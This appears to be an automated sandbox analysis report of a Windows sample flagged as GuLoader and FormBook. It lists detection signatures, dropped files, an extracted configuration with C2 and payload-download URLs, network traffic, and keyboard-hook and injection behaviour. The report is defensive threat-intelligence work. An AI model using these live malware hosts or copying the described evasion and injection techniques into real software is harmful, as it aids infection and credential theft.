Analysis Report os9TZxfmTZ.exe

Overview

General Information

Sample Name:	os9TZxfmTZ.exe
Analysis ID:	385246
MD5:	ad0c93b574bb947cff15483eda82811e
SHA1:	ad379c5a86bf646c4a079e737a364ab352107e5b
SHA256:	bcaac39113bd17158fe86a77328f97e9c3fa14860c9c4449a8ae0768c85243f4
Tags:	exeGuLoader
Infos:
Most interesting Screenshot:

Detection

FormBook GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Potential malicious icon found

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

Yara detected GuLoader

C2 URLs / IPs found in malware configuration

Contains functionality to hide a thread from the debugger

Creates an undocumented autostart registry key

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Drops PE files with benign system names

Drops executables to the windows directory (C:\Windows) and starts them

Hides threads from debuggers

Installs a global keyboard hook

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Uses schtasks.exe or at.exe to add and modify task schedules

Yara detected VB6 Downloader Generic

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Installs a global mouse hook

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Modifies existing windows services

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains strange resources

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Signatures

AV Detection:

Antivirus / Scanner detection for submitted sample

Source: os9TZxfmTZ.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\icsys.icn.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Roaming\mrsys.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Windows\System\svchost.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\stsys.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Windows\System\spoolsv.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Windows\System\explorer.exe	Avira: detection malicious, Label: TR/Dropper.Gen

Found malware configuration

Source: 0000001D.00000002.353190007.000000001E150000.00000040.00000001.sdmp	Malware Configuration Extractor: FormBook {"C2 list": ["www.evolvekitchendesign.com/ffw/"], "decoy": ["unmutedgenerations.com", "localmoversuae.com", "centralrea.com", "geyyfphzoe.com", "silverpackfactory.com", "techtronixx.com", "shop-deinen-deal.com", "buehne.cloud", "inspirefreedomtoday.com", "chapelcouture.com", "easton-taiwan.com", "quanaonudep.store", "merzigomusic.com", "wpzoomin.com", "service-lkytrsahdfpedf.com", "yeasuc.com", "mydogtrainingservice.com", "galeribisnisonline.com", "cscremodeling.com", "bom-zzxx.com", "ensobet88.com", "vegancto.com", "digivisiol.com", "advancetools.net", "gzqyjd.com", "xtgnsl.com", "ftfortmyers.com", "g-siqueira.com", "ufdzbhrxk.icu", "tiekotiin.com", "youschrutedit.com", "takahatadenkikouji.com", "goodfastco.com", "jtelitetraining.com", "planet-hype.com", "gigwindow.com", "levelxpr.com", "besttechmobcomm.info", "funneldesigngenie.com", "mylisting.cloud", "alltwoyou.com", "mortgagesandprotection.online", "monthlydigest.info", "senlangdq.com", "postphenomenon.com", "slymwhite.com", "masonpreschool.com", "wahooshop.com", "meridiangummies.com", "samsungpartsdept.com", "saludbellezaybienestar.net", "vickifoxproductions.com", "shawandwesson.info", "nutrepele.com", "gorillatanks.com", "praktijkinfinity.online", "lanteredam.com", "refinedmanagement.com", "tiwapay.com", "fruitsinbeers.com", "charliekay.net", "realironart.com", "sonsofmari.com", "kedingtonni.com"]}
Source: 0000001D.00000002.347705923.0000000000563000.00000040.00000001.sdmp	Malware Configuration Extractor: GuLoader {"Payload URL": "https://demo.sdssoftltd.co.uk/bin_iOxAb78.bin\u0000http://103.141.138.118/bin_iOxAb78"}

Multi AV Scanner detection for submitted file

Source: os9TZxfmTZ.exe	Virustotal: Detection: 82%			Perma Link
Source: os9TZxfmTZ.exe	ReversingLabs: Detection: 95%

Yara detected FormBook

Source: Yara match	File source: 0000001D.00000002.353190007.000000001E150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.347654001.0000000000060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.368572720.0000000003740000.00000040.00000001.sdmp, type: MEMORY

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\icsys.icn.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\mrsys.exe	Joe Sandbox ML: detected
Source: C:\Windows\System\svchost.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\stsys.exe	Joe Sandbox ML: detected
Source: C:\Windows\System\spoolsv.exe	Joe Sandbox ML: detected
Source: C:\Windows\System\explorer.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: os9TZxfmTZ.exe

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 2.2.icsys.icn.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 8.2.spoolsv.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 5.2.spoolsv.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 38.2.explorer.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 8.0.spoolsv.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 0.2.os9TZxfmTZ.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 2.0.icsys.icn.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 4.0.explorer.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 6.0.svchost.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 4.2.explorer.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 5.0.spoolsv.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 38.0.explorer.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 0.0.os9TZxfmTZ.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen

Compliance:

Uses 32bit PE files

Source: os9TZxfmTZ.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source:	Binary string: explorer.pdbUGP source: os9tzxfmtz.exe , 0000001D.00000002.353878128.000000001E6B0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: os9tzxfmtz.exe , 0000001D.00000002.353360463.000000001E380000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: os9tzxfmtz.exe
Source:	Binary string: explorer.pdb source: os9tzxfmtz.exe , 0000001D.00000002.353878128.000000001E6B0000.00000040.00000001.sdmp

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\os9TZxfmTZ.exe	Code function: 4x nop then push ebp	0_2_00417143
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe	Code function: 4x nop then push ebp	0_2_00416130
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe	Code function: 4x nop then push ebp	0_2_004171D7
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe	Code function: 4x nop then push ebp	0_2_004179F2
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe	Code function: 4x nop then push ebp	0_2_00417190
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe	Code function: 4x nop then push ebp	0_2_0041725A
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe	Code function: 4x nop then push ebp	0_2_004172E5

Networking:

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: www.evolvekitchendesign.com/ffw/
Source: Malware configuration extractor	URLs: https://demo.sdssoftltd.co.uk/bin_iOxAb78.binhttp://103.141.138.118/bin_iOxAb78

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive

Source: C:\Users\user\Desktop\os9tzxfmtz.exe

Code function: 29_2_00569F5D InternetReadFile,

29_2_00569F5D

Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: vccmd01.googlecode.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Mon, 12 Apr 2021 06:59:22 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20

Source: os9tzxfmtz.exe	String found in binary or memory: http://103.141.138.118/bin_iOxAb78.bin
Source: svchost.exe, 00000007.00000002.499129422.0000017AF2815000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: svchost.exe, 00000007.00000002.499129422.0000017AF2815000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: svchost.exe, 00000007.00000002.499129422.0000017AF2815000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: svchost.exe, 00000007.00000002.495084605.0000017AED2B1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2
Source: svchost.exe, 00000007.00000002.500311596.0000017AF2AD0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000004.00000002.367343924.00000000007E8000.00000004.00000020.sdmp	String found in binary or memory: http://vccmd01.googlecode.com/
Source: explorer.exe, 00000004.00000003.317775813.00000000007DE000.00000004.00000001.sdmp, explorer.exe, 00000004.00000002.367327455.00000000007DD000.00000004.00000020.sdmp	String found in binary or memory: http://vccmd01.googlecode.com/files/cmsys.gif
Source: explorer.exe, 00000004.00000002.367258347.00000000007A1000.00000004.00000020.sdmp	String found in binary or memory: http://vccmd01.googlecode.com/files/cmsys.gifA
Source: explorer.exe, 00000004.00000002.367258347.00000000007A1000.00000004.00000020.sdmp	String found in binary or memory: http://vccmd01.googlecode.com/files/cmsys.gift
Source: explorer.exe, 00000004.00000003.317744632.00000000007CA000.00000004.00000001.sdmp, explorer.exe, 00000004.00000002.367305174.00000000007CA000.00000004.00000020.sdmp	String found in binary or memory: http://vccmd01.t35.com/cmsys.gif
Source: explorer.exe, 00000004.00000003.317744632.00000000007CA000.00000004.00000001.sdmp	String found in binary or memory: http://vccmd01.t35.com/cmsys.gifnw
Source: explorer.exe, 00000004.00000003.317744632.00000000007CA000.00000004.00000001.sdmp	String found in binary or memory: http://vccmd01.t35.com/cmsys.gifr
Source: explorer.exe, 00000004.00000002.367234221.0000000000783000.00000004.00000020.sdmp	String found in binary or memory: http://vccmd01.t35.com/cmsys.gifusercontent.comn
Source: explorer.exe, 00000004.00000003.317775813.00000000007DE000.00000004.00000001.sdmp	String found in binary or memory: http://vccmd01.t35.com/e.com/files/cmsys.gif
Source: explorer.exe, 00000004.00000002.367234221.0000000000783000.00000004.00000020.sdmp	String found in binary or memory: http://vccmd01.zxq.net/
Source: explorer.exe, 00000004.00000002.367234221.0000000000783000.00000004.00000020.sdmp	String found in binary or memory: http://vccmd01.zxq.net/01.zxq.net/cmsys.gifusercontent.comu
Source: explorer.exe, 00000004.00000003.317744632.00000000007CA000.00000004.00000001.sdmp	String found in binary or memory: http://vccmd01.zxq.net/cmsys.gif
Source: explorer.exe, 00000004.00000003.317744632.00000000007CA000.00000004.00000001.sdmp	String found in binary or memory: http://vccmd01.zxq.net/cmsys.gifH
Source: explorer.exe, 00000004.00000003.317744632.00000000007CA000.00000004.00000001.sdmp	String found in binary or memory: http://vccmd01.zxq.net/cmsys.gifVw
Source: explorer.exe, 00000004.00000003.317744632.00000000007CA000.00000004.00000001.sdmp	String found in binary or memory: http://vccmd01.zxq.net/cmsys.gifllxw
Source: explorer.exe, 00000004.00000003.317744632.00000000007CA000.00000004.00000001.sdmp	String found in binary or memory: http://vccmd01.zxq.net/cmsys.gifr
Source: explorer.exe, 00000004.00000003.317744632.00000000007CA000.00000004.00000001.sdmp	String found in binary or memory: http://vccmd01.zxq.net/cmsys.gift
Source: explorer.exe, 00000004.00000003.317775813.00000000007DE000.00000004.00000001.sdmp	String found in binary or memory: http://vccmd01.zxq.net/e.com/files/cmsys.gif
Source: explorer.exe, 00000004.00000002.367343924.00000000007E8000.00000004.00000020.sdmp	String found in binary or memory: http://vccmd02.googlecode.com/
Source: explorer.exe, 00000004.00000002.367343924.00000000007E8000.00000004.00000020.sdmp	String found in binary or memory: http://vccmd02.googlecode.com/files/cmsys.gif
Source: explorer.exe, 00000004.00000002.367327455.00000000007DD000.00000004.00000020.sdmp	String found in binary or memory: http://vccmd02.googlecode.com/files/cmsys.gifi%I
Source: explorer.exe, 00000004.00000002.367343924.00000000007E8000.00000004.00000020.sdmp	String found in binary or memory: http://vccmd03.googlecode.com/
Source: explorer.exe, 00000004.00000003.317775813.00000000007DE000.00000004.00000001.sdmp, explorer.exe, 00000004.00000002.367327455.00000000007DD000.00000004.00000020.sdmp	String found in binary or memory: http://vccmd03.googlecode.com/files/cmsys.gif
Source: explorer.exe, 00000004.00000003.317775813.00000000007DE000.00000004.00000001.sdmp	String found in binary or memory: http://vccmd03.googlecode.com/files/cmsys.gifC%c
Source: explorer.exe, 00000004.00000003.317775813.00000000007DE000.00000004.00000001.sdmp	String found in binary or memory: http://vccmd03.googlecode.com/files/cmsys.gifP%n
Source: svchost.exe, 00000021.00000002.493270876.00000240A1E40000.00000004.00000001.sdmp	String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000021.00000002.493270876.00000240A1E40000.00000004.00000001.sdmp	String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 00000021.00000002.493270876.00000240A1E40000.00000004.00000001.sdmp	String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 00000021.00000002.493270876.00000240A1E40000.00000004.00000001.sdmp	String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000021.00000002.493270876.00000240A1E40000.00000004.00000001.sdmp	String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: os9tzxfmtz.exe	String found in binary or memory: https://demo.sdssoftltd.co.uk/bin_iOxAb78.bin
Source: os9tzxfmtz.exe , 0000001D.00000002.347705923.0000000000563000.00000040.00000001.sdmp	String found in binary or memory: https://demo.sdssoftltd.co.uk/bin_iOxAb78.binhttp://103.141.138.118/bin_iOxAb78.bin
Source: explorer.exe, 00000004.00000003.317744632.00000000007CA000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.comI

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook

Source: C:\Users\user\Desktop\os9TZxfmTZ.exe	Windows user hook set: 6252 mouse C:\Windows\SYSTEM32\MSVBVM60.DLL	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Windows user hook set: 6340 mouse C:\Windows\SYSTEM32\MSVBVM60.DLL	Jump to behavior
Source: C:\Windows\System\explorer.exe	Windows user hook set: 6388 mouse C:\Windows\SYSTEM32\MSVBVM60.DLL	Jump to behavior
Source: C:\Windows\System\explorer.exe	Windows user hook set: 0 keyboard low level c:\windows\system\explorer.exe	Jump to behavior
Source: C:\Windows\System\explorer.exe	Windows user hook set: 0 mouse low level c:\windows\system\explorer.exe	Jump to behavior
Source: C:\Windows\System\spoolsv.exe	Windows user hook set: 6412 mouse C:\Windows\SYSTEM32\MSVBVM60.DLL	Jump to behavior
Source: C:\Windows\System\svchost.exe	Windows user hook set: 6444 mouse C:\Windows\SYSTEM32\MSVBVM60.DLL	Jump to behavior
Source: C:\Windows\System\spoolsv.exe	Windows user hook set: 6636 mouse C:\Windows\SYSTEM32\MSVBVM60.DLL	Jump to behavior
Source: C:\Windows\System\explorer.exe	Windows user hook set: 6884 mouse C:\Windows\SYSTEM32\MSVBVM60.DLL

Creates a DirectInput object (often for capturing keystrokes)

Source: os9TZxfmTZ.exe, 00000000.00000002.252539425.000000000075A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Installs a global mouse hook

Source: C:\Windows\System\explorer.exe

Windows user hook set: 0 mouse low level c:\windows\system\explorer.exe

Source: 0000001D.00000002.353190007.000000001E150000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001D.00000002.353190007.000000001E150000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001D.00000002.347654001.0000000000060000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001D.00000002.347654001.0000000000060000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.368572720.0000000003740000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.368572720.0000000003740000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02280A61 EnumWindows,NtSetInformationThread,	1_2_02280A61
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02289F5D NtResumeThread,	1_2_02289F5D
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_0228906B NtWriteVirtualMemory,LoadLibraryA,	1_2_0228906B
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_022899F7 NtProtectVirtualMemory,	1_2_022899F7
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02289A29 NtProtectVirtualMemory,	1_2_02289A29
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02283A38 NtWriteVirtualMemory,	1_2_02283A38
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_0228A234 NtResumeThread,	1_2_0228A234
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02283A05 NtWriteVirtualMemory,	1_2_02283A05
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_0228A27F NtResumeThread,	1_2_0228A27F
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02283E5F NtWriteVirtualMemory,	1_2_02283E5F
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02283A51 NtWriteVirtualMemory,	1_2_02283A51
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02283EAF NtWriteVirtualMemory,	1_2_02283EAF
